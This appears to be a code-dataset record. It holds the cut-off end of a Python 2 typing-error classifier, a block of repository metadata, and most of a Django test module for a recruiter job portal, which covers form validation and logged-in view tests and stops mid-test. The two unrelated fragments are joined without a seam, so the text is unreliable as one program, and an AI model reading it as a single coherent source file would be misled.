print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
damerau_distance_type = "sub"
error_position = str(i + 1)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif typing_list[0][i + 1] == typing_list[1][i]:
del_flag = 1
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i - 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
else:
sub_flag = 1
damerau_distance_type = "sub"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
elif del_flag == 1 and typing_list[0][i + 1] != typing_list[1][i]:
damerau_distance_type = "sub"
error_position = str(i + 2)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif sub_flag == 1 and typing_list[0][i] != typing_list[1][i]:
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i - 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif sub_flag == 1 and i == len(typing_list[1]) - 1:
damerau_distance_type = "del"
error_position = str(i + 1)
error_string = typing_list[0][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif len(typing_list[0]) - len(typing_list[1]) == -1:
ins_flag = 0
sub_flag = 0
for i in range(len(typing_list[0])):
if ins_flag == 0 and sub_flag == 0 and typing_list[0][i] != typing_list[1][i]:
if i == len(typing_list[0]) - 1 or typing_list[0][i + 1] != typing_list[1][i + 1] and typing_list[0][i] != typing_list[1][i + 1]:
damerau_distance_type = "ins"
error_position = str(i + 1)
error_string = typing_list[1][i + 1]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
damerau_distance_type = "sub"
error_position = str(i + 2)
error_string = typing_list[0][i]
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif typing_list[0][i] == typing_list[1][i + 1]:
ins_flag = 1
damerau_distance_type = "ins"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
else:
sub_flag = 1
damerau_distance_type = "sub"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
elif ins_flag == 1 and typing_list[0][i] != typing_list[1][i + 1]:
damerau_distance_type = "sub"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif sub_flag == 1 and typing_list[0][i] != typing_list[1][i]:
damerau_distance_type = "ins"
error_position = str(i + 1)
error_string = typing_list[0][i]
related_string = typing_list[1][i]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
elif sub_flag == 1 and i == len(typing_list[0]) - 1:
damerau_distance_type = "ins"
error_position = str(i + 2)
error_string = "_"
related_string = typing_list[1][i + 1]
print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
break
if __name__ == "__main__":
pair_compare()
| 47.978852
| 162
| 0.662742
| 2,386
| 15,881
| 4.0943
| 0.044426
| 0.330638
| 0.123861
| 0.076159
| 0.896202
| 0.89395
| 0.888934
| 0.879824
| 0.874092
| 0.865698
| 0
| 0.037875
| 0.211951
| 15,881
| 331
| 163
| 47.978852
| 0.742709
| 0.059442
| 0
| 0.783688
| 0
| 0
| 0.007439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003546
| null | null | 0.117021
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c54882ddebfd13ca1a1ce9a6567ffb2ee97cebf
| 112,782
|
py
|
Python
|
recruiter/tests.py
|
ashwin31/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | 1
|
2021-09-27T05:01:39.000Z
|
2021-09-27T05:01:39.000Z
|
recruiter/tests.py
|
kiran1415/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | null | null | null |
recruiter/tests.py
|
kiran1415/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | 1
|
2022-01-05T09:02:32.000Z
|
2022-01-05T09:02:32.000Z
|
from django.test import TestCase
from django.core.files.uploadedfile import SimpleUploadedFile
from datetime import datetime
from django.urls import reverse
import json
from .forms import (JobPostForm, Company_Form, User_Form, ChangePasswordForm,
PersonalInfoForm, MobileVerifyForm, MailTemplateForm, MenuForm,
RecruiterForm, EditCompanyForm)
from peeldb.models import (User, Country, State, City, Skill,
Qualification, Industry, FunctionalArea, JobPost, FacebookPost,
Company, Menu, InterviewLocation, AgencyCompany,
AgencyCompanyCatogery, )
class job_post_form_test(TestCase):
def setUp(self):
self.user = User.objects.create(username='micro_test')
self.country = Country.objects.create(name="India")
self.state = State.objects.create(
name='Telangana', country_id=self.country.id)
self.city = City.objects.create(
name='hyderabad', state_id=self.state.id)
self.industry = Industry.objects.create(name="Software")
self.skill = Skill.objects.create(name='Python')
self.functional_area = FunctionalArea.objects.create(
name='functional_area')
self.qualification = Qualification.objects.create(name='btech')
upload_file = open('static/img/report.png', 'rb')
self.file_dict = SimpleUploadedFile(upload_file.name, upload_file.read())
def test_job_post_for_valid(self):
form = JobPostForm(data={'title': 'java developer',
'job_role': 'developer',
'functional_area': [self.functional_area.id],
'vacancies': 1, 'description': 'swetha',
'min_year': 1, 'max_year': 1, 'min_month': 2,
'max_month': 2, 'fresher': True,
'edu_qualification': [self.qualification.id],
'visa_required': True,
'visa_country': self.country.id,
'visa_type': 'Permanent', 'skills': [self.skill.id],
'min_salary': 1000, 'max_salary': 1200,
'company_address': 'abc', 'company_name': 'abc',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'company_description': 'abc', 'last_date': '12/10/2024',
"job_type": "Internship", 'location': [self.city.id],
'industry': [self.industry.id],
'final_industry': 'hello', 'final_skills': 'dcd',
'final_functional_area': 'fa',
'final_edu_qualification': 'dcs',
'published_date': '12/10/2024 00:00:00',
'salary_type': 'Year', 'published_message':'hellooo'}, user=self.user)
self.assertTrue(form.is_valid())
def test_job_post_form_invalid(self):
form = JobPostForm(data={'user': self.user.id,
'job_role': 'developer',
'functional_area': self.functional_area.id,
'vacancies': 1, 'keywords': '',
'description': 'swetha',
'min_year': 1, 'max_year': 1,
'min_month': 2, 'max_month': 2,
'qualification': [self.qualification.id],
'fresher': True, 'visa_required': True,
'visa_country': self.country.id,
'visa_type': 'Permanent',
'skills': [self.skill.id],
'min_salary': 1000, 'max_salary': 1200,
'last_date': '2015-07-24',
'posted_on': '2015-07-06 18:01:59.826458+05:30',
'created_on': '2015-07-06 18:01:59.826458+05:30',
'status': 'Draft', 'previous_status': 'Draft',
'post_on_fb': True, 'post_on_ln': True, "post_on_tw": True,
"fb_views": '10', "tw_views": '10', "ln_views": '10',
"other_views": "10", "job_type": "Permanent",
'location': [self.city.id], 'industry': self.industry.id,
'final_industry': 'hello',
'final_skills': 'dcd', 'final_functional_area': 'fa',
'final_edu_qualification': 'dcs',
'salary_type': 'Year'},
user=self.user)
self.assertFalse(form.is_valid())
class recruiter_Views_test(TestCase):
def setUp(self):
self.user = User.objects.create(
email='testuser@mp.com', password='test', is_active=True)
self.country = Country.objects.create(name="India")
self.state = State.objects.create(
name='Telangana', country_id=self.country.id)
self.city = City.objects.create(
name='hyderabad', state_id=self.state.id)
self.industry = Industry.objects.create(name="Software")
self.skill = Skill.objects.create(name='Python')
self.functional_area = FunctionalArea.objects.create(
name='functional_area')
self.qualification = Qualification.objects.create(name='btech')
class company_form_test(TestCase):
def setUp(self):
self.user = User.objects.create(username='micro_test')
def test_company_for_valid(self):
form = Company_Form(data={'name': 'company123', 'email': 'company123@gmail.com',
'short_code': 'comp123', 'website': 'https://micropyramid.com',
'phone_number': '9876543210', 'company_type': 'Company'})
self.assertTrue(form.is_valid())
def test_company_form_invalid(self):
form = Company_Form(data={'name': '',
'email': 'company123@gmail.com',
'short_code': 'comp123',
'website': '',
'phone_number': ''})
self.assertFalse(form.is_valid())
class user_form_test(TestCase):
def setUp(self):
self.user = User.objects.create(username='micro_test')
def test_company_for_valid(self):
form = User_Form(
data={'password': 'Mp1234@', 'email': 'company123@gmail.com',
'mobile': '9876543210', 'client_type': 'Consultant', 'username':'myname'})
self.assertTrue(form.is_valid())
def test_company_form_invalid(self):
form = User_Form(
data={'password': 'Mp1234@', 'email': 'company123@gmail.com', 'mobile': '987654321'})
self.assertFalse(form.is_valid())
form = User_Form(
data={'password': 'Mp1234@', 'email': 'company123@gmail.com', 'mobile': ''})
self.assertFalse(form.is_valid())
class change_password_form_test(TestCase):
def setUp(self):
self.user = User.objects.create(username='micro_test')
self.user.set_password('mp')
self.user.save()
def test_change_password_for_valid(self):
form = ChangePasswordForm(
data={'oldpassword': 'mp', 'newpassword': 'mp123', 'retypepassword': 'mp123'},
user=self.user)
self.assertTrue(form.is_valid())
def test_change_password_form_invalid(self):
form = ChangePasswordForm(
data={'oldpassword': 'mp', 'newpassword': 'mp123', 'retypepassword': ''},
user=self.user)
self.assertFalse(form.is_valid())
class personal_info_form_test(TestCase):
def setUp(self):
self.user = User.objects.create(username='micro_test')
self.country = Country.objects.create(name="India")
self.state = State.objects.create(
name='Telangana', country_id=self.country.id)
self.city = City.objects.create(
name='hyderabad', state_id=self.state.id)
self.industry = Industry.objects.create(name="Software")
self.skill = Skill.objects.create(name='Python')
self.functional_area = FunctionalArea.objects.create(
name='functional_area')
self.qualification = Qualification.objects.create(name='btech')
def test_personal_info_for_valid(self):
upload_file = open('static/img/report.png', 'rb')
file_dict = {'profile_pic': SimpleUploadedFile(
upload_file.name, upload_file.read())}
data = {'username': 'mp', 'first_name': 'micropyramid', 'last_name': 'mp',
'name': 'micro', 'city': self.city.id, 'state': self.state.id,
'country': self.country.id, 'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'technical_skills': [self.skill.id], 'nationality': self.country.id,
'year': '2016', 'month': '06', 'profile_description': 'hello',
'job_role': 'developer', 'mobile': '9876543210', 'company_type': 'general',
'user_id': self.user.id}
form = PersonalInfoForm(data, file_dict)
self.assertTrue(form.is_valid())
def test_personal_info_form_invalid(self):
form = PersonalInfoForm(data={'username': 'mp', 'first_name': 'micropyramid',
'last_name': 'mp', 'name': 'micro',
'city': self.city.id, 'state': self.state.id,
'country': self.country.id,
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'technical_skills': [self.skill.id],
'nationality': self.country.id,
'year': '2016', 'month': '06', 'profile_description': 'hello',
'job_role': 'developer', 'mobile': '901074', 'user_id': self.user.id})
self.assertFalse(form.is_valid())
class mobile_verify_form_test(TestCase):
def test_change_password_for_valid(self):
form = MobileVerifyForm(data={'mobile_verification_code': 'mp'})
self.assertTrue(form.is_valid())
def test_change_password_form_invalid(self):
form = MobileVerifyForm(data={'mobile_verification_code': ''})
self.assertFalse(form.is_valid())
class mail_template_form_test(TestCase):
def test_mail_template_for_valid(self):
form = MailTemplateForm(
data={'subject': 'mp', 'message': 'message', 'title': 'title'})
self.assertTrue(form.is_valid())
def test_mail_template_form_invalid(self):
form = MailTemplateForm(
data={'subject': 'mp', 'message': 'message', 'title': ''})
self.assertFalse(form.is_valid())
class menu_form_test(TestCase):
def test_menu_form_for_valid(self):
form = MenuForm(
data={'title': 'mp', 'url': 'https://micropyramid.com'})
self.assertTrue(form.is_valid())
def test_menu_form_invalid(self):
form = MenuForm(
data={'title': '', 'url': ''})
self.assertFalse(form.is_valid())
class recruiter_form_test(TestCase):
def test_recruiter_form_for_valid(self):
form = RecruiterForm(
data={'mobile': '8977455970', 'email': 'nikhila@micropyramid.com', 'job_role': 'developer', 'first_name': 'nikhila', 'password': 'Mp1234@'})
self.assertTrue(form.is_valid())
def test_recruiter_form_for_valid_data(self):
form = RecruiterForm(
data={'mobile': '9101010747', 'email': 'nikhila@micropyramid.com', 'job_role': 'developer', 'first_name': 'nikhila', 'password': 'Mp1234@'})
print (form.errors)
self.assertTrue(form.is_valid())
def test_recruiter_form_invalid(self):
form = RecruiterForm(
data={'mobile': '12345', 'email': '', 'job_role': '', 'profile_pic': '', 'first_name': ''})
self.assertFalse(form.is_valid())
class edit_companyform_test(TestCase):
def test_edit_company_form_for_valid(self):
form = EditCompanyForm(
data={'name': 'testingcompany',
'company_type': 'Company',
'website': 'https://testingcompany.com',
'profile': 'testingcompany', 'address': 'hyd',
'level': '1'})
self.assertTrue(form.is_valid())
def test_edit_company_form_for_valid_data(self):
form = EditCompanyForm(
data={'name': 'testingcompany', 'company_type': 'Company',
'website': 'https://testingcompany.com', 'profile': '',
'address': '', 'level': ''})
self.assertFalse(form.is_valid())
def test_edit_company_form_invalid(self):
form = EditCompanyForm(
data={'name': 'testingcompany', 'company_type': 'Company',
'website': 'https://testingcompany.com', 'profile': '',
'address': '', 'level': ''})
self.assertFalse(form.is_valid())
class recruiter_get_views_test(TestCase):
def setUp(self):
self.company = Company.objects.create(
name='testing', website='testingsite.com', is_active=True, company_type='Consultant')
self.recruiter = User.objects.create(
email='recruiter@mp.com', username="recruiter", user_type='AA', is_active=True,
mobile_verified=True, company=self.company, is_admin=True, agency_admin=True)
self.recruiter.set_password('mp')
self.recruiter.save()
self.recruiter_mobile_not_verified = User.objects.create(
email='recruiter_mobile@mp.com', username="recruiter_mobile", user_type='RR',
is_active=True, mobile_verified=False, mobile_verification_code='123456',
company=self.company)
self.inactive_recruiter = User.objects.create(
email='inactive_recruiter@mp.com', username="inactive_recruiter", user_type='RR',
is_active=True, mobile_verified=False, mobile_verification_code='123456',
company=self.company)
self.recruiter_mobile_not_verified.set_password('mp')
self.recruiter_mobile_not_verified.save()
self.inactive_recruiter.set_password('mp')
self.inactive_recruiter.save()
self.company_recruiter = User.objects.create(
email='testing@mp.com', username='testing', user_type='RR', company=self.company,
is_active=True, mobile_verified=True)
self.company_recruiter.set_password('mp')
self.company_recruiter.save()
self.country = Country.objects.create(name="India")
self.agency_company = AgencyCompany.objects.create(
name='testing', website='testing.com', decription='hello', company=self.company,
created_by=self.recruiter)
self.agency_category = AgencyCompanyCatogery.objects.create(
name="junior", percantage='1')
self.state = State.objects.create(
name='Telangana', country_id=self.country.id)
self.city = City.objects.create(
name='hyderabad', state_id=self.state.id)
self.industry = Industry.objects.create(name="Software")
self.skill = Skill.objects.create(name='Python')
self.functional_area = FunctionalArea.objects.create(
name='functional_area')
self.qualification = Qualification.objects.create(name='btech')
self.current_date = datetime.strptime(
str(datetime.now().date()), "%Y-%m-%d").strftime("%m/%d/%Y")
self.walk_in_from_date = '06/24/2016'
self.walk_in_to_date = '06/24/2026'
for each in range(0, 15):
self.jobpost = JobPost.objects.create(user=self.recruiter,
title='test-jobpost_'+str(each),
vacancies='6', description='job post description',
job_type='Full_Time',
status='Draft', published_message='test message',
company_address='company address',
company_description='company description',
last_date='2016-09-09')
self.interview_location = InterviewLocation.objects.create(
venue_details='hyderabad, India', latitude='14.8976',
longitude='21.0967')
self.jobpost.job_interview_location.add(self.interview_location)
self.jobpost.skills.add(self.skill)
self.jobpost.industry.add(self.industry)
self.jobpost.functional_area.add(self.functional_area)
self.jobpost.location.add(self.city)
FacebookPost.objects.create(
job_post=self.jobpost, page_or_group='Page',
page_or_group_id='1305678', post_id='8764567', post_status='Posted')
FacebookPost.objects.create(
job_post=self.jobpost, page_or_group='Group',
page_or_group_id='1305678', post_id='8764567', post_status='Posted')
# TwitterPost.objects.create(job_post=self.jobpost, page_or_profile='Profile', post_id='126789', post_status='Posted')
self.other_edu = ['[{"other_edu_qualification_1":"h"}]']
self.fa = ['[{"other_functional_area_1":"ot"}]']
self.other_ind = ['[{"other_industry_name_1":"hello industry"}]']
self.other_skill = ['[{"other_skill_name_1":"test skill"}]']
upload_file = open('static/img/report.png', 'rb')
self.file_dict = SimpleUploadedFile(upload_file.name, upload_file.read())
def test_views_with_employee(self):
response = self.client.get(
reverse('recruiter:account_activation', kwargs={'user_id': '100'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_views_with_employee_login(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get('/recruiter/')
self.assertEqual(response.status_code, 302)
response = self.client.get('/recruiter/job/list/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/list.html')
response = self.client.get('/recruiter/job/list/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/list.html')
response = self.client.get(reverse('recruiter:profile'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/user/profile.html')
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/recruiter/job/internship/new/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/new.html')
response = self.client.get('/recruiter/job/walk-in/new/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/job/new.html')
response = self.client.get('/recruiter/change-password/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/user/change_password.html')
response = self.client.get('/recruiter/thank-you-message/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, 'recruiter/registration_success.html')
response = self.client.get('/recruiter/how-it-works/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'recruiter/how_it_works.html')
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'salary_type': 'Year',
'min_salary': '123',
'max_salary': '1234',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': ['[{"other_industry_name_1":"h"}]'],
'final_skills': ['[{"other_skill_name_1":"test"}]'],
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '',
'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id], 'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'no_of_interview_location': '0',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '', 'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'salary_type': 'Year',
'min_salary': '1', 'max_salary': '3',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': '', 'job_type': 'full-time',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '2',
'final_location_1': ['[13.1543, 77.783]'],
'final_location_2': [''],
'venue_details_2': [''],
'venue_details_1': 'mp',
'show_location_1': 'False',
'show_location_2': 'True',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'published_message':'hellooo', })
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '1',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '0',
'max_year': '1',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22',
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1',
'max_year': '0',
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22','published_message':'hellooo' })
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'salary_type': 'Year',
'min_salary': '1',
'max_salary': '22', 'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': ['1'],
'visa_type': ['hello'],
'published_message':'hellooo',
'salary_type': 'Year'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'test-job-post',
'job_type': 'full-time',
'status': 'Draft',
'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': self.current_date,
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'salary_type': 'Month',
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'], 'visa_country': ['1'],
'visa_type': ['hello'],
'published_message':'hellooo'})
self.assertEqual(response.status_code, 200)
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'published_message':'hellooo',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'published_message':'hellooo',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
response = self.client.post('/recruiter/job/full-time/new/',
data={'title': 'new-test-job-post',
'job_type': 'Walk-in',
'status': 'Draft', 'vacancies': '',
'description': 'job post description',
'published_message': 'test message',
'company_address': 'company address',
'company_description': 'company description',
'last_date': '10/10/2016',
'skills': [self.skill.id],
'location': [self.city.id],
'industry': [self.industry.id],
'functional_area': [self.functional_area.id],
'final_industry': self.other_ind,
'final_skills': self.other_skill,
'final_edu_qualification': self.other_edu,
'final_functional_area': self.fa,
'no_of_interview_location': '0',
'min_year': '1', 'max_year': '0',
'visa_required': ['True'],
'visa_country': self.country.id,
'country': self.country.id,
'visa_type': ['hello'],
'code': 'code', 'job_role': 'developer',
'min_month': '1', 'max_month': '2',
'company_name': 'micro',
'company_website': 'http://abc.com',
'company_logo': self.file_dict,
'published_date': '06/23/2018 13:36:28',
'keywords': ['key1', 'key2'],
'walkin_from_date': self.walk_in_from_date,
'walkin_to_date': self.walk_in_to_date,
'walkin_time': '00:00',
'walkin_contactinfo': 'hyderabad, india',
'salary_type': 'Year',
'min_salary': '1000',
'max_salary': '2000',
'agency_amount': '10000',
'agency_client': self.agency_company.id,
'agency_category': self.agency_category.id,
'agency_invoice_type': 'Recurring',
'agency_job_type': 'Permanent',
'published_message': 'hellooo',
'agency_recruiters': [self.recruiter.id]})
self.assertEqual(response.status_code, 200)
# error_data = json.loads(str(response.content, encoding='utf-8'))
def test_new_job_with_mobile_not_verified(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get('/recruiter/job/full-time/new/')
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_edit_job_with_mobile_not_verified(self):
user_login = self.client.login(
email='recruiter_mobile@mp.com', password='mp')
self.assertTrue(user_login)
response = self.client.get(
reverse('recruiter:edit', kwargs={'job_post_id': '1'}))
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, 'recruiter/recruiter_404.html')
def test_edit_job_with_mobile_verified(self):
user_login = self.client.login(email='recruiter@mp.com', password='mp')
